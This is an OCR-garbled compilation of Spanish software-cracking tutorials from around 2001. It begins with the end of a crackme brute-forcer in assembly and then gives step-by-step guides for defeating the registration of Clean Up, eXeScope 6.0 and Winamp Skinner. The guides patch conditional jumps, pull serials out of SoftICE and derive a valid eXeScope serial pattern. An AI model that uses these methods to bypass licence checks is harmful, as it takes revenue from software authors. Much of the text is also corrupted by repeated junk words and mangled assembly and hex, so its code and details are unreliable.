.endif 


od ole ale ode ole ale ole ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ole ole ale ole ole le ole ole ole ole als ole ode ole ole ole ole ole ole ole ole ode ole ole ole ole ole ole als ole ole als ole ole als ole ole le 
> 

> 

; no consentimos 3 p en las combinaciones 

> 


lod ole ale ode ole ale ode ole ale ole ole ale ode ole ole ole ole ale ode ole le ole ole le ole ole ale ole ole ale ole ole ode ole als ole ole ole ole ole ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole ale 
> 


mov pes, O 


mov ax, word ptr [esi+1] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 
inc pes 
.endif 


mov ax, word ptr [esi+3] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 
inc pes 
.endif 


mov ax, word ptr [esi+5] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


Af al=="p" [| al=="p" 


inc pes 
.endif 


mov ah, byte ptr [esi+7] 
Af ah=="p" [| ah=="p" 
inc pes 

.endif 


1f pes >2 
jmp masl 
.endif 


ole ole ole ole ole ole ode ode ole ole ole ole ole ole ole ol de ole ole ole ole ode ole oe ole ode le e ole ole ole ole ode ole ode ol e ole ole ole ole oe ole oe ole e ole ole ole ole de ole de ole 
El 

; 

; no consentimos 3 r en las combinaciones 

; 


ds ole le ode ole ale ode ole ale ode ole ole ode ole ale ode ole ale ode ole ale ode ole ale ode ole le ode ole ale ole ole ole ole ole ole ode ole ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole ale 
> 


mov erres, O 


mov ax, word ptr [esi+1] 
ifab=="r" | ah=="r" 
inc erres 

.endif 


”_"” 


if al=="r" || al=="r 
inc erres 
.endif 


mov ax, word ptr [esi+3] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


if al=="r" || al=="r" 
inc erres 
.endif 


mov ax, word ptr [esi+5] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


if al=="r" || al=="r" 
inc erres 
.endif 


mov ah, byte ptr [esi+7] 
ifab=="r" || ah=="r" 
inc erres 

.endif 


Af erres >2 
jmp masl 
.endif 


ole ee ol ole ole ole ole ole ole ode ole ole ole ole ole ole ode ol de ole ole ole ole ode ole oe ole oe ole e ole ole ole ole ole ole ode ole e ole ole ole ole oe ole ode ole e ole ole ole ole e ole de ole 
El 

; 

; no consentimos 3 s en las combinaciones 

; 


od le le ode ole ole ode ole ale ode ole ale ode ole ale ode ole le ode ole le ode ole ale ode ole le ode ole ale ole ole ole ole ole ole ole ole ole ole ole ole ole als ole ode als ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


mov eses, O 


mov ax, word ptr [esi+1] 
Af ah== ="s " [| ah=="s" 
inc eses 

.endif 


Af al== ="s " ll al== ="s " 
inc eses 
.endif 


mov ax, word ptr [esi+3] 
Af ah== ="s " [| ah== ="s " 
inc eses 

.endif 


Af al== ="s " ll al== ="s " 
inc eses 
.endif 


mov ax, word ptr [esi+5] 
Af ah== ="s " [| ah== ="s " 
inc eses 

.endif 


="s " "e" 


if al= || al=="s 
inc eses 


.endif 


mov ah, ia BE [esi4+7] 
ifal |lah=="s" 
inc eses 

.endif 


="s " 


If eses >2 
jmp masl 
.endif 


lol ee ol ole ole ole ole ole ode ode ole ole ole ole ole ole ode ol de ole ole ole ole ole ole oe ole oe ole e ole ole ole ole oe ole de ole e ole ole ole ole oe ole oe ole e ole ole ole ole e ole de ole 
> 

; 

; no consentimos 3 t en las combinaciones 


> 


od ole le ode ole ale ode ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole le ode ole le ode ole le ole ole ole ole ole ole ole ole ole ode ole ole ole als ole ole ole ole ole ole ole ole ole ole ole als ole ole als ole ole ale 
> 


mov tes, O 


mov ax, word ptr [esi+1] 
ifabh=="t" | ah=="t" 

inc tes 

.endif 


if al=="t" | al=="t" 
inc tes 
.endif 


mov ax, word ptr [esi+3] 
ifabh=="t" | an=="t" 

inc tes 

.endif 


if al=="t" | al=="t" 
inc tes 
.endif 


mov ax, word ptr [esi+5] 


Af ah=="t" [| ah==" " 
inc tes 
.endif 
Af al=="t" [| al==" " 
inc tes 
.endif 
mov ah, byte ptr [esi+7] 
Af ah=="t" [| ah==" " 
inc tes 
.endif 
If tes >2 
jmp masl 
.endif 


ole ole ol ole ole ole ode oe ole ole ole ole ode ole ole ol de ole ole ole ole ole ole ode ole oe ole e ole ole ole ole oe ole ode ole e ole ole ole ole oe ole oe ole e ole ole ole ole oe ole od ole 
> 

; 

; no consentimos 3 v en las combinaciones 


> 


ode ole le ode ole ale ode ole ale ode ole ale ole ole ale ole ole ale ode ole ale ode ole le ode ole le ode ole ale ode als ole ole ole ole ole ole ode ode als ole ole ole ole ole als ole ode ale ole ole ole ole ole als ole ole als ole ole ale 
> 


mov uves, O 


mov ax, word ptr [esi+1] 
ifah=="v" || ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


mov ax, word ptr [esi+3] 
ifabh=="v" | ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="v" || ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="v" | ah=="v" 
inc uves 

.endif 


If uves >2 
jmp masl 
.endif 


ds ole ale ode ole ale ode ole ole ole ole ole ode ole ale ode ole ale ode ole le ole ole ale ode ole ale ode ole le ode ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


; 
; no consentimos 2 x en las combinaciones 
> 


ds ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole als ole ole le 
> 


mov exis, O 


mov ax, word ptr [esi+1] 
ifah=="x" || ah=="x" 
inc exis 

.endif 


Af al=="x" [| al==" " 
inc exis 
.endif 


mov ax, word ptr [esi+3] 
if ah=="x" [| ah==" " 
inc exis 

.endif 


ifal=="x" || al=="x" 
inc exis 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="x" | ah=="x" 
inc exis 

.endif 


if al=="x" || al=="x" 
inc exis 
.endif 


mov ah, byte ptr [esi+7] 
ifah=="x" || ah=="x" 
inc exis 

.endif 


If exis >1 
jmp masl 
.endif 


altajo: 


mov esi, offset buffer 

pusha 

inc esi ;inc esi para saltarse la h 

xor eax, eax 

xor edx, edx 

dec esi 

mov eax, 0f1c05789h ;este n? raro es para saltarse la comprovacion 
a3: ¡de la 1* h (nos evitamos un bucle de ffff ciclos) 
inc esi 

xor ah, [esi] 

a0: 

xor al, dl 

add eax, 04e493220h 

mov cl, al 

ror eax, cl 

xor eax, O55aaSaSah 

dec dx 


jnz a0 

cmp byte ptr [esi+1], O ¡en el ultimo bucle esi apunta a O 

jnz a3 ;por lo tanto siempre tendremos el mismo resultado 

xor eax, 0d202eef9h ;de esta forma nos evitamos otro bucle de ffffh ciclos 
popa 

jz escribir 

jmp masl 


leer: 

pusha 

invoke createfile,addr archivo, 1 
generic_read+generic_write, 1 

null, A 

null, 

open_existing, 1 

file_attribute_normal, 1 

null 

mov hfichero, eax 

invoke getfilesize,hfichero,null 

mov fsize, eax 

mov eax, Offffh 

invoke globalalloc, null,eax 

mov memptr,eax 

invoke readfile,hfichero,memptr,fsize,addr bread,null 
mov eax, memptr 

add eax, fsize 

sub eax, Oah 

invoke Istrcpyn,addr buffer , ; copio la cadena 
eax, 

9 

¡invoke globalfree, memptr 

invoke closehandle, hfichero 

popa 

ret 

escribir: 

pusha 

invoke createfile,addr archivo, 1 
generic_read+generic_write, 1 

null, A 

null, A 

open_existing, 1 

file_attribute_normal, 1 

null 

mov hfichero, eax 

invoke getfilesize,hfichero,null 

mov fsize,eax 

; add eax, Oah 

; invoke globalrealloc,memptr ,eax,null 
¡mov memptr,eax 

invoke readfile,hfichero,memptr,fsize,addr bread,null 
mov ebx, memptr 

add ebx, fsize 

invoke Istrcpyn,ebx , ; copio la cadena 
addr buffer, 

9 


mov dword ptr [ebx+8], Oa0dh 
mov ebx, fsize 

add ebx, Oah 

push ebx 

pop fsize 


invoke setfilepointer,hfichero,null,null,file_begin 
invoke writefile,hfichero,memptr,fsize,addr bwrite,null 
; Invoke globalfree, memptr 

invoke closehandle, hfichero 

popa 

jmp masl 


fin: 
invoke messagebox,null,addr sacabo,addr marmota,mb_ok 
invoke exitprocess,hinstance 


end start 


conclusiones 


creo necesario puntualizar algunos detalles que considero importantes. 

- casi al final del codigo, están las rutinas que comprueban si la cadena pasa los test. observad como se ha optimizado 
el codigo para aumentar la velocidad de proceso. podréis ver anotaciones que hemos ido haciéndonos sobre la marcha 
para sacarle el mayor partido posible. 

- hay muchas combinaciones que pasan los test y producen en el crackme el desencriptado del codigo. opino que es 
un fallo grave en la estructura del programa, ya que genera codigo impredecible y despues lo ejecuta. no se han dado 
casos de situaciones graves, pero estas cosas son peligrosas ;-). 

- Crack el destripador opina que tal y como esta planteada la protección, no tiene viabilidad comercial, ya que 
depende de un único serial, y ya sabemos todos como circulan los seriales xdddd. sería interensate este tipo de 
protección si el serial se montara en base a alguna peculiaridad del equipo donde rueda como por ejemplo el número de 
serie de windows. 

- como el marmó6.exe funciona en segundo plano y el sistema estaba bajo minimos para aumentar el tiempo de 
procesador dedicado al fb, utilizamos pupe para visualizar la evolucion de las combinaciones y matar el proceso 
cuando teniamos que ocuparnos de otras cosas. 

- agradecer a todos los que por unos días nos prestaron algo de su tiempo de procesador y corrieron en sus maquinas 
el marm6.exe 


crick 
avalanche 
jikay 
coheta 


un saludo muy especial a jotake y a crick que también invirtieron su tiempo en desentrañar el misterio de la clave del 
crackme +2 de ni2. 


antes de que se me olvide... la clave es heyboyos 
marmota éz crack el destripador a 31 de diciembre de 2000. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 


programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Clean up 


PROTECCION: nombre de usuario / serial 

Objetivo: Encontrar el serial. 

Descripcion: 222797222797 9777 

Dificultad: newbie+ 

DOWNLOAD: http://www.worlinx.net/pgehart 

Herramientas: w32dasm, editor hexa, softice 4.05 

CRACKER: smÁS|-| £: !<oBDg0m FECHA: 22/01/2001 
introduccion 


ah.. un tutorial más.. qué tal te pareció el otro?? bien?? mal?? regular??.. bueno.. ésta vez atacaremos el programa con 
el desensamblador en lugar del soft ice.. 


el clean up sirve para limpiar los archivos "innecesarios" del disco.. una buena aplicación pero no vale 20 dlls!!! 
mucho menos la licencia de 1000 dlls!! la verdad no sé cómo se venden éstos productos.. pero bueno.. empecemos!!! 


al atake 


ok.. abrimos el ejecutable.. hmm?? no hay banner ni algo que nos diga que tenemos que comprar.. tratemos de registrarons.. 
file>register.. ponemos nuestros datos.. 


hmm.. 2 mensajes.. "invalid characters in user name”.. no le gustaron mis garabatos.. pero.. ni modo.. "name / code mismatch 
try again" qué feo mensaje no?? bueno.. ya tenemos una pista.. ataquemos por ahí.. abrimos el w32dasm... disassembler> open 
file to disassemble... buscamos nuestro programa víctima y lo abrimos.. esperamos unos cuantos segun2.. y listo.. damos click 


en [E] y aparecerá una ventanita.. buscamos nuestro "textito".. y unas 3 o 4 pantallas abajo lo encontramos.. damos doble 
click y aparecemos en un lugar parecido a ésto.. 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
| :004090e6(c), :00409100 (c) 


:0040916c 6a00 push 00000000 
:0040916e 6a00 push 00000000 


* possible stringdata ref from data obj ->"name / code mis-match. try again." 
| 
:00409170 68e4714100 push 004171e4 


hmm.. muy bonito.. debemos parchear ésos 2 saltos condicionales “pa que nunca llegue al mensaje de error.. vamos a la 
primera.. presionamos goto>code location y apuntamos 004090€6 .. así llegaremos a.. 


:004090e6 0f8580000000 jne 0040916c 


ok!! miramos el offset <un numerito que está hasta abajo de la pantalla del w32dasm y termina en 

h, por ejemplo aquí es.. OOOO90e6h la "h" significa hexadecimal, en el work shop <el editor hexa> pondremos "90e6" notemos 
que no se ponen los Os y tampoco la h.. 

muy bien!!! ahora busquemos el siguiente.. ya sabes.. goto>code location y anotamos 00409100 ahora.. llegamos aquí.. 


:00409100 746a je 0040916c 


miramos el offset y es.. 90€6.. 


muy bien!! abrimos el hex workshop <puedes usar tu editor hexadecimal favorito!!> y reemplazamos.. 


ahora salimos.. nos preguntará si queremos salvar.. decimos que sí <si te dice que hay error o estás corriendo el programa o 
estás en el w32 dasm, deberás cerrarlo> ahora, nos pregunta que si queremos hacer copia de seguridad.. decimos que sí.. 


ahora corramos el clean up.. ponemos cualquier nombre.. y.. 


sí!! ahora la prueba de fuego.. cerremos el programa y volvamos a abrirlo.. 


qué!?!? qué pasó!??! no nos registró!!! sólo nos mostró el mensaje!!! hmm.. borramos el ejecutable y le cambiamos el nombre 
al archivo "cleanup.bak" a "cleanup.exe".. 


aquí es donde entra el amado softice!!! abramos el symbol loader <el programa que está junto al directorio del soft ice.. el 
ejecutable llamado "loader32.exe"> ahora démosle file>open module buscamos el programa y lo cargamos.. ahora 


presionamos E y entraremos al soft ice.. ahí pondremos el salto que vimos en el w32 dasm.. pero cuál?? probemos el 
00409100 así que.. 


bpx 00409100 

damos enter y ctrl+d.. ahora estamos en el programa.. damos file>register... ponemos nuestros datos.. 
name: smash <-- ok.. ya que no aceptó mis garabatos 

code: 1111 


muuuy bien!! damos enter y entraremos al soft ice.. nos damos cuenta que estamos en el ejecutable.. desde aquí buscaremos 
nuestro +*.. busquemos algo sospechoso.. 


d eax <-- nada 

d ebx <-- nada.. 

d ecx <-- bien!! nuestro +!!! debemos estar cerca!! * 

d edx <-- un + sospechoso.. apuntémoslo.. * 

veamos.. mi serial es d168cfa5.. entonces ponemos.. file>register 


name: smash 


code: d16bcfa5 


extrañamente, si nuestro ++ está en letras minúsculas, el programa no lo acepta.. y el código de registro es diferente para cada 
usuario.. 


*nota!! algo muy común que me pasaba al leer otros tutoriales es que decía de forma similar a ésta que estoy presentando.. lo 
que yo no sabía es dónde estaba mi número.. pues bien, al entrar al softice, podemos ver 3 ventanas con flechitas, si no 
tenemos el mouse activado tendremos que movernos con las teclas.. para movernos dentro de la pantalla de en 1/2 <donde está 
el lenguaje del ensamblador> damos ctrl+arriba o abajo y arriba de ésta pantalla hay otra.. con los valores en hex.. a ésta la 
movemos con alt+arriba/abajo.. aquí veremos nuestro número y el número "bueno".. 


despedida 


como dije en mi tutorial pasado.. éste tutorial es de un newbie para un newbie.. lo hago para compartir mis conocimientos y 
escribir tutoriales como me hubiera gustado que me enseñaran a mí.. creo que ya me gustó hacer tutoriales jeje.. es divertido!! 


como en cada tutorial.. quiero recalcar que por ningún motivo tratamos de perjudicar el trabajo del programador!!! al 
contrario!! tratamos de mejorar las protecciones de los programas que ellos hacen!! y para quien se dedica a desprotegerlos.. 
es con solo fines intelectuales.. no lucrativos!! 


por segunda vez, quiero agradecer a la compilación de tutoriales del prOfesor_x y por su apoyo personal para hacer éste 


tutorial.. también a la gran página de karpoff.. posiblemente la mejor página de tutoriales en español!! y.. finalmente.. a quien 
se tomó la molestia de leer éste tutorial.. 


si tienes dudas, a smash O gamehacks.net "porqué ésto.. porqué aquello??" son aceptables.. más, como la mayoría de los 
crackers no aceptamos "cómo se hace??" "me podrías crackear..??" para éso es éste tutorial!! para aprender!! si te gusta el 


programa y estás seguro que lo usarás.. cómpralo!! y recompensa el trabajo del programador!! 


salu2 a to2 los crackers de lengua española! ! 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
eXeScope 6.0 


Serial. 
Conseguir el número y hacer la plantilla para obtenerlos. 


Permite conocer datos de un programa y efectuar modificaciones 
cosméticas (menús, iconos, etc.) 


Novato 


http://welcome.to/karpoff 


Softice 


Caos reptante FECHA: 01/01/01 


introduccion 


este programa pide que nos registremos si vamos a usarlo durante más de dos semanas y nos permite 
hacerlo introduciendo un número de serie correcto. en la mayoría de programas -como en este caso-, 
cuando se introduce un número erróneo -por equivocación, naturalmente ;0) -nos aparece un mensaje más 
o menos contundente diciendo que nos hemos equivocado; algunos programadores más astutos omiten este 
mensaje para dificultar la honesta labor de las buenas gentes que se dedican a crackear programas. pero lo 
que casi siempre aparece cuando se introduce el número correcto, es un mensaje dando las gracias por 
registrarse etc. -lo cual es muy gratificante- :0) . pues en este caso no aparece nada, ni da las gracias, ni 
aparece como registrado en about exescope... ni nada. la única manera de saber con seguridad que el 
programa está registrado es modificar un programa un par de veces, ya que la versión no registrada sólo 
permite hacerlo una vez. es lamentable que después de gastarse uno sus buenos dineros ni siquiera se le 
den las gracias... :o( 


al atake 


en primer lugar, trataremos de registrarnos (en help / regist) introduciendo nuestro nombre y número, pero este va a ser un 
tutorial tramposo y vamos a poner un número casi bueno, ya que esto va a facilitar la explicación del proceso de 
comprobación del serial number. en cuanto al nombre, como veremos, no tiene ninguna relación con dicho proceso. 
pondremos pues: caos reptante y 1234541910. antes de pulsar ok, haremos ctrl+d para entrar en el softice e introduciremos 
el correspondiente breakpoint, en este caso recurriremos al casi infalible bpx hmemcpy, ya que si probamos bpx 
getdlgitemtexta o bpx getwindowtexta que son las alternativas más corrientes veremos que son menos infalibles. a 
continuación pulsaremos f5 para volver al exescope. ¡plof! al pulsar ok, ha actuado el softice y vemos que nos hemos caído 
en kernel. 

de nuevo le damos a f5, ya que hay que leer dos cadenas de texto. ahora hay que salir de aquí y volver al exescope. 
pulsamos f12 siete veces y aparecemos aquí: 


0167:00437922 5e pop esi 
0167:00437923 5b pop ebx 
0167:00437924 c3 ret 


empezamos a tracear con f10, vemos varios calls a la vuelta de los cuales el programa ejecuta algunas instrucciones que no 
parecen tener interés para nosotros. pero al llegar aquí: 


0167:004807d1 e85a790000 call 00488130 
0167:004807d6 84c0 test al, al 
0167:004807d8 0f848d000000 je 0048086b 


vemos que al regresar del call comprueba el valor de al. como nuestro número no es lo bastante bueno, el valor de eax será 
0, y si continuamos, se efectuará el salto y caeremos en el foso de los cocodrilos. también podemos cambiar el valor a 1 
mediante r eax y el programa quedará registrado. no es eso lo que queremos... de momento, y por lo tanto entraremos en 
el call. 


0167:00488130 55 push ebp 

0167:00488131 8bec mov ebp, esp 

0167:00488133 51 push ecx 

0167:00488134 53 push ebx 

0167:00488135 8955fc mov dword ptr [ebp-04], edx 
0167:00488138 8b45fc mov eax, dword ptr [ebp-04] 
0167:0048813b e8f0bbf7ff call 00403d30 

0167:00403d30 85c0 test eax, eax 

0167:00403d32 7409 je 00403d3d 

0167:00403d34 8b50£8 mov edx, dword ptr [eax-08] 
0167:00403d37 42 inc edx 

0167:00403d38 7e03 jle 00403d3d 

0167:00403d3a 8950f8 mov dword ptr [eax-08], edx 
0167:00403d3d c3 ret 

0167:00488140 33c0 xor eax, eax 

0167:00488142 55 push ebp 

0167:00488143 68b2814800 push 004881b2 

0167:00488148 64ff30 push dword ptr fs: leax] 
0167:0048814b 648920 mov dword ptr fs: [eax], esp 
0167:0048814e 33db xor ebx, ebx 

0167:00488150 8b45fc mov eax, dword ptr [ebp-04] 
0167:00488153 e824baf7ff call 00403b7c 


aquí empieza lo interesante :0) 


0167:00403b7c 85c0 test eax, eax <- comprueba la longitud del número 

0167:00403b7e 7403 je 00403b83 introducido, si es cero, salta 

0167:00403b80 8b40fc mov eaxX, dword ptr [eax-04] 

0167:00403b83 c3 ret 

0167:00488158 83£80a cmp eax, 0000000a <- comprueba que el número es de 10 
cifras 

0167:0048815b 753f jne 0048819c 


0167:0048815d 8b55fc mov edx, dword ptr [ebp-04] <- la dirección del número 
0167:00488160 b8c8814800 mov eax, 004881c8 <- la dirección de un string 
interesante: "al910" 

0167:00488165 e89%ebcf7ff call 00403e08 

0167:00403e08 85c0 test eax, eax 

0167:004038e0a 7440 je 00403e4c 

0167:00403e0c 85d2 test edx, edx 

0167:00403e0e 7431 je 00403e41 

0167:00403e10 53 push ebx 

0167:00403e11 56 push esi 

0167:00403e12 57 push edi 

0167:00403e13 89c6 mov esi, eax <- la dirección de "a1l910" 

0167:00403e15 89d7 mov edi, edx <- la dirección de nuestro número 

0167:00403e17 8b4ffc mov ecx, dword ptr [edi-04] <- a=longitud del número 

0167:00403ela 57 push edi 

0167:00403e1lb 8b56fc mov edx, dword ptr [esi-04] <- 5=longitud de "al910" 

0167:00403ele a dec edx <- 4 

0167:00403e1f 781lb js 00403e3c <- salta si edx=0 

0167:00403e21 8a06 mov al, byte ptr [esi] <- 4l=código ascii de "a" 

0167:00403e23 46 inc esi <- apunta ahora a "1910" 

0167:00403e24 29d1 sub ecx, edx <- a-4=6 

0167:00403e26 7el4 jle 00403e3c <- no salta 

0167:00403e28 f2ae repnz scasb <- busca entre los 6 primeros 

Caracteres (ecx)la letra "a" (al) 

0167:00403e2a 7510 jne 00403e3c <- no salta (la ha encontrado) 

0167:00403e2c 89%cb mov ebx, ecx 

0167:00403e2e 56 push esi <- la dirección de "1910" 

0167:00403e2f 57 push edi <- la dirección de nuestro número 0167:00403e30 

89d1 mov ecx, edx <- 4 

0167:00403e32 f3a6 repz cmpsb <- compara los 4 (ecx) caracteres que siguen 
a "a" para ver si son "1910" (edi/esi) 

0167:00403e34 5f pop edi 

0167:00403e35 5e pop esi 

0167:00403e36 740c je 00403e44 <- salta porque hasta ahora nuestro 


número es lo bastante bueno 


lo que ha pasado hasta ahora es que el programa ha verificado que el número que hemos introducido es de 10 cifras y que 
entre ellas están a1910. si no están, repite exactamente el mismo proceso con el número a1423. si tampoco lo encuentra, 
nos manda a paseo. 


0167:00403e44 5a pop edx <- la dirección de nuestro número 
0167:00403e45 89f8 mov eax, edi <- la dirección del número que sigue a a 
0167:00403e47 29d0 sub eax, edx <- nos da el número de orden de a (4) 
0167:00403e49 5f pop edi 

0167:00403e4a 5e pop esi 

0167:00403e4b 5b pop ebx 

0167:00403e4c c3 ret 

0167:0048816a 48 dec eax <- 4-1=3 

0167:0048816b 7410 je 0048817d <- salta si es O 


aquí descubrimos que nuestro número debería haber empezado por a para que efectuara este salto, ya que de no hacerlo nos 
echa. nosotros queremos continuar, para esto tenemos que evitar el salto. para ello, podemos modificar el valor de eax 
directamente con el ratón o con r eax o bien modificando el salto: cuando la linea blanca está sobre la instrucción del salto, 
es decir, cuando es la siguiente instrucción a ejecutar, con d eip y el ratón o a eip y jne 0048817d. continuamos: 


0167:0048817d 8b45fc mov eaxX, dword ptr [ebp-04] <- la dirección de nuestro 
número 
0167:00488180 0fb64008 mOVZX €eax, byte ptr [eax+08] <- 31=código ascii de 1 (el 
noveno número) 
0167:00488184 8b55fc mov edx, dword ptr [ebp-04] <- la dirección de nuestro 
número 
0167:00488187 0fb65209 movzx edx, byte ptr [edx+09] <- 30=código ascii de O (el 
décimo número) 
0167:0048818b 03c2 add eax, edx <- eax=31+30=61 


0167:0048818d b90a000000 mov ecx, 0000000a <- ecx=a 


0167:00488192 99 cda <- ¿para que? 

0167:00488193 f£7f9 idiv ecx <- se divide eax (61) por ecx (a) y 
el resto se coloca en edx (7) 

0167:00488195 83fa04 cmp edx, 00000004 <- compara 7 con 4 ¡ay! 

0167:00488198 “7502 jne 0048819c <- hasta aquí llegamos 


la siguiente condición que se nos impone es que la suma de los códigos ascii de los números 9* y 10%, dividida por a nos dé 
un resto de 4. si para simplificar contamos únicamente con números del O al 9, tendremos que la suma de los dos números 
será igual a 30 + 9 +30 +10", (ya que el código hexadecimal ascii de los números va del 30 para el O al 39 para el 9) es 
decir 60 + 9” + 10%. si lo pasamos a decimal, ya que el hexadecimal sólo es para uso de seres con ocho dedos en cada 
mano, tendremos 96 + 9% + 10”. dividimos 96 por 10 y nos queda un resto de 6. así pues, ¿cuánto deben sumar los números 
9” y 10” para que sumados al seis y dividido por diez nos dé un resto de 4? deben sumar 8. bien, si modificaramos el salto 
para continuar tendríamos: 


0167:004881%a b301 mov bl, 01 

0167:0048819%c 33c0 xXor eax, eax 

0167:0048819%e 5a pop edx 

0167:0048819f 59 pop ecx 

0167:004881a0 59 pop ecx 

0167:00488la1l 648910 mov dword ptr fs:[eax], edx 
0167:00488l1a4 68b9814800 push 004881b9 

0167:004881la9 8d45fc lea eax, dword ptr [ebp-04] 
0167:00488lac e84fb7f7ff call 00403900 


bueno, parece que lo que sigue ya no nos interesa. es el momento de sacar conclusiones. 
cualquier serial number válido debe tener la siguiente configuración: 


A'abenon 


1423 donde abc representan los tres caracteres que os pida el cuerpo y nn dos números cuya 
suma sea 8. elegir entre 1910 Ó 1423 es a gusto del consumidor. fácil ¿no? 
también podéis buscar otras combinaciones, por ejemplo: son válidos números como: al910saral ó a1423manul. 


antes de terminar, debo recordaros que esto no es más que un ejercicio intelectual y que si queréis utilizar regularmente el 
programa deberéis romper la hucha con vuestros ahorros y entregarlos a unas manos rapaces que ya los están esperando. 


mi dirección de e-mail es: caos_reptante O hotmail.com 


finalmente un saludo para todos los que hayáis leído este tutorial, para mi amigo valentín por empujarme al mal camino y 
especialmente para karpoff junto con mi agradecimiento. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Winamp Skinner 


nombre/serial 

encontrar un *+ válido 

un programa para hacer skins “pal winamp 
newbie 


http://members.tripod.com/ajie q 


soft ice 4.05 


smAs|-| s !<eggo0m FECHA: 


introduccion 


11/01/01 


bueno.. éste es mi primer tutorial, me animé a hacerlo porque recientemente he visto que newbies <como yo> 
hacen tutoriales para "compartir" lo que saben, ya sea mucho o poco, pero con la idea de enseñar.. 


el skinner es un programa “pa hacer skins <a poco?!?!> “pal winamp.. es un programa un tanto útil y la 
protección.. deja algo que desear, pero nos servirá “pa aprender un poco más 


al atake 


bueno, abramos el skinner y veamos.. help > about > register.. ponemos nuestros datos. . 


Smásgi 


1111 


damos ok.. y... nada?!?! nada?!?! no hay mensaje!!! hmm.. reflexionemos.. si lo desensamblamos.. hmm.. mala 
idea.. mejor usemos nuestro complicado y queridísmo softice.. 


cárguenlo!! yo los espero..!!! 


hmm.. 


ya?? 


ok!! 


qué hacemos ahora?? pongamos un break point.. cuál?? 
intentemos con hmemcpy.. pongamos nuestros datos.. nuestro +.. y el bpx: 


bpx hmemcpy 


ok!! hasta ahora todo bien?? 
pulsamos ok.. y sorpresa!! dentro del softice!! 


bueno, como el soft ice “pesca” todo, absolutamente todo, lo primero que checa es el nombre, lo cual no nos 
interesa así que presionamos 


f5 

ahora ya estamos en donde comprueba el +*.. así que nos adentramos con f12 “pa entrar a buscar nuestro +f.. 
veamos.. 

empecemos a tracear.. <ya saben, £10> hasta que lleguemos a un lugar como éste.. 


00406090 ffd7 call edi <-- llama al mensaje “edi” 

00406d92 8d44240c lea eax, [esp+0c] <-- eax es ahora esp+0c 
00406096 50 push eax <-- guarda eax 

00406d97 e894100000 call 00407e30 <-- llama a un salto más abajo 
00406d9c 830404 add esp, 04 <-- se le agrega 4 a esp 

00406d9f 8bd8 mov ebx, eax <-- ebx y eax valen lo mismo 
00406dal 8d442438 lea eax, [esp+38] <-- eax ahora es esp+38 
00406da5 50 push eax <-- guarda eax 


00406da6 e8550f0000 call 00407400 <-- llamada a una cadena abajo 

00406dab 83c404 add esp, 04 <-- se le agregan 4 a esp 

00406dae 8bf8 mov edi, eax <-- edi y eax valen lo mismo 

00406db0 85ff test edi, edi <-- checa el resultado 

00406db2 7537 jnz 00406deb <-- rutina de comprobación 

00406db4 833d3c52420000 cmp dword ptr [0042523c] ,00 <-- una comparación 
00406dbb 7417 jz OO406dd4 <-- un pequeño salto para abajo 


muy bien!! checa el área marcada es el área de la comprobación.. a ver.. revisemos.. 
? eax = 0000001111 <-- nuestro +!!! 
2 ebx = 000584665 <-- el + correcto!! 


ahora, vamos a nuestro programa.. y.. bingo!! 


Winamp Skin Maker 1.2 


ua 
Ya Bar... . 


e-mail : gautama(bdg.centrin.net.id 


http:/l/members.tripod.com/ajle_q/ 


pero al hackear.. nuestro objetivo es aprender al máximo.. veamos otra forma de llegar a éste punto.. 
produjimos el serial con el hmemcpy.. pero tal vez pueda servir otro no?? 
a ver.. intentemos.. 


bpx getwindowtexta <--hmm no.. no puede ser, ya que no da un cuadro de diálogo o algo similiar 
bpx messageboxa <-- por la misma razón que la de arriba 
bpx getdlgitemtexta <--wow!! éste picó!!! 


ahora, presionamos f5 <ya que lo primero que es comprobado, es el nombre.. y con f5 lo dejamos seguir 
trabajando> 

ahora picó otra vez.. presionamos f12 “pa meternos en el programa, aquí, si se fijan bien es casi la misma zona 
en la que estábamos anteriormente.. 

damos f10 9 veces y llegamos a la misma zona que es explicada arribita.. 


>>despedida.. 

bueno.. me despido de éste, mi primer tutorial, recuerda que sólo es “pa aumentar conocimientos!!! de ninguna 
manera, tratamos de perjudicar el trabajo de los programadores!!! una vez más, si vas a usar el programa.. 
cómpralo!! 


quiero agradecer a to2 los crackers españoles, a la compilación de tutoriales del profesor_x, al grupo de 


karpoff, por siempre tener tan buenos tutoriales <y por recibir el mío..> y principalmente.. a tí, que leíste mi 
tutorial de arriba a abajo.. 


ah!! otra cosa.. si ven que me equivoqué en algo, alguna falta de ortografía.. lo que sea..!! dímelo!! así 
